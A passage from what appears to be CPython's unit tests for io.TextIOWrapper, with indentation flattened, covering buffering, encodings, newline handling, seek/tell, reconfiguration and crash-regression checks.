# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
